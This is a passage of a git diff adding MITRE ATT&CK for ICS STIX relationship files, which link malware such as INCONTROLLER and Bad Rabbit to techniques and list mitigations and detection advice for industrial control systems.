"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:21.181Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can send custom Modbus commands to write register values on Schneider PLCs.(Citation: CISA-AA22-103A) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can send write tag values on OPC UA servers.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68.json new file mode 100644 index 0000000000000000000000000000000000000000..a5bc9f66388f9484cdd6173d0560551ade0ca4e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--71fb326d-622c-4b5d-97c5-6d0cbfcbed54", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Ensure all browsers and plugins are kept updated to help prevent the exploit phase of this technique. Use modern browsers with security features enabled.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1aa02c37-973e-46bd-ab45-609463e514e9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1aa02c37-973e-46bd-ab45-609463e514e9.json new file mode 100644 index 0000000000000000000000000000000000000000..aea67f7265c26d89e9503b2662bab0f699ce0b75 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1aa02c37-973e-46bd-ab45-609463e514e9.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--a7d96f1c-eefe-4e2e-8449-a4fc68c5bfa6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1aa02c37-973e-46bd-ab45-609463e514e9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1acccbe8-64e1-49ad-87df-215d5c87f050.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1acccbe8-64e1-49ad-87df-215d5c87f050.json new file mode 100644 index 0000000000000000000000000000000000000000..15e336fdd62f75320187f491e27242cbc6cd97a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1acccbe8-64e1-49ad-87df-215d5c87f050.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--cb0c9fe9-1593-428b-a538-bad4c2ed03f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1acccbe8-64e1-49ad-87df-215d5c87f050", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:42:43.105Z", + "description": "Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa.json new file mode 100644 index 0000000000000000000000000000000000000000..7963a3bc7d52c1cee681f367790e07e8387d3bad --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--9090d35e-15ef-4c95-ae7c-c6cb8269b1f7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa", + "created": "2022-09-27T16:35:12.372Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:35.207Z", + "description": "Monitor for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4.json new file mode 100644 index 0000000000000000000000000000000000000000..459cda2c82929c8db629b3d3476883f37775b76b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0b8f62fa-1bb5-4644-8a63-3aae9d3f1f72", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:39.703Z", + "description": "Monitor for newly executed processes that depend on user interaction, especially for applications that can embed programmatic capabilities (e.g., Microsoft Office products with scripts, installers, zip files). This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c8dd2735-bd04-4413-847d-316b77c6de19.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c8dd2735-bd04-4413-847d-316b77c6de19.json new file mode 100644 index 0000000000000000000000000000000000000000..d3bd0d1423f730e212a357b2ce4af501f4cc6f14 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c8dd2735-bd04-4413-847d-316b77c6de19.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--85b1470c-af24-49cd-aeb4-e7906ef10aa6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c8dd2735-bd04-4413-847d-316b77c6de19", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:23:14.457Z", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in the [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b.json new file mode 100644 index 0000000000000000000000000000000000000000..1a75d42ac0b9ebe8c526371f9753032857b1128e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--94e536a9-71b0-4035-b79e-c4cbcb7574f5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b", + "type": "relationship", + "created": "2021-10-04T20:52:20.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Lazarus KillDisk April 2018", + "description": "K\u00e1lnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", + "url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + } + ], + "modified": "2021-10-04T20:54:09.057Z", + "description": "(Citation: ESET Lazarus KillDisk April 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "target_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1.json new file mode 100644 index 0000000000000000000000000000000000000000..dee28728f59f4c79148988fb18317c07fc1aff49 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--30403215-3aa6-47ab-8ae2-288fbcce4604", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Implement network allowlists to minimize serial comm port access to only authorized hosts, such as comm servers and RTUs.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d16e8909-d055-4174-aeb1-22c0613b2f73.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d16e8909-d055-4174-aeb1-22c0613b2f73.json new file mode 100644 index 0000000000000000000000000000000000000000..7175beae801cb1a439fdc52a5f4a6bd4964da291 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d16e8909-d055-4174-aeb1-22c0613b2f73.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--bc965a57-5660-48fe-9b73-6db3cc45c261", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d16e8909-d055-4174-aeb1-22c0613b2f73", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:53:55.028Z", + "description": "Disable unnecessary legacy network protocols that may be used for AiTM if applicable.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab.json new file mode 100644 index 0000000000000000000000000000000000000000..b61587d6ecdf4cebc0c08dcb86c698db9c26bd36 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--459c5e48-3de5-4057-aa18-40c0c0f2519f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:31:22.665Z", + "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--dadfed22-d70c-482b-9026-964396d75484.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--dadfed22-d70c-482b-9026-964396d75484.json new file mode 100644 index 0000000000000000000000000000000000000000..71abd1c196c501c9fa8bd8ad458351883caf5725 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--dadfed22-d70c-482b-9026-964396d75484.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0d778367-fc09-4e45-8ba8-7f9a2ec78492", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dadfed22-d70c-482b-9026-964396d75484", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:28.053Z", + "description": "Monitor for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938.json new file mode 100644 index 0000000000000000000000000000000000000000..78790de35de80c9db2cfd5413d34f7848b71d037 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--cfb3b5b2-3ee6-443f-9965-18b5c4b23d93", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:46:30.174Z", + "description": "Statically defined ARP entries can prevent manipulation and sniffing of switched network traffic, as some AiTM techniques depend on sending spoofed ARP messages to manipulate network host's dynamic ARP tables.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065.json new file mode 100644 index 0000000000000000000000000000000000000000..27b0dc5b798d13c2a8fe973337fdbd3adb8c7d03 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c6949dc9-04e0-48f7-b88b-02146e09d3ad", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:40:47.334Z", + "description": "Collect file hashes. Monitor for file names that do not match their expected hash. Perform file monitoring. Files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\". For added context on adversary procedures and background see [Masquerading](https://attack.mitre.org/techniques/T1036) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf.json new file mode 100644 index 0000000000000000000000000000000000000000..dcb5689072789c5e0f7f1d264633585bae9e98f0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--54c1be03-dd09-4c6e-9e77-7399aa8f058d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.154Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a.json new file mode 100644 index 0000000000000000000000000000000000000000..aa666c29a62c095a20b7c4224e3d2889f420c3f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--db322807-986b-401b-9e5d-735118fc2d6e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:51:47.079Z", + "description": "Monitor ICS automation protocols for functions that restart or shutdown a device. Commands to restart or shutdown devices may also be observable in traditional IT management protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--edf73653-b2d7-422f-b433-b6a428ff12d4.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--edf73653-b2d7-422f-b433-b6a428ff12d4.json new file mode 100644 index 0000000000000000000000000000000000000000..5b83d2713b0b5b8f76f12fd9d27dc31196dd6286 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--edf73653-b2d7-422f-b433-b6a428ff12d4.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1d3e94e7-35b8-4f27-98ac-0700430b34da", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--edf73653-b2d7-422f-b433-b6a428ff12d4", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:21.210Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is disguised as an Adobe Flash installer. When the file is opened it starts locking the infected computer. (Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9.json new file mode 100644 index 0000000000000000000000000000000000000000..30fd47fc810727041cc680804176a47c4442f637 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--2ac36275-1ce3-4497-b500-8b7baf3d3b03", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f347b4fe-d829-427d-851a-fff3393441db.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f347b4fe-d829-427d-851a-fff3393441db.json new file mode 100644 index 0000000000000000000000000000000000000000..f2104870dc30f96e7cf91892440200b91c1fbc7e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f347b4fe-d829-427d-851a-fff3393441db.json @@ 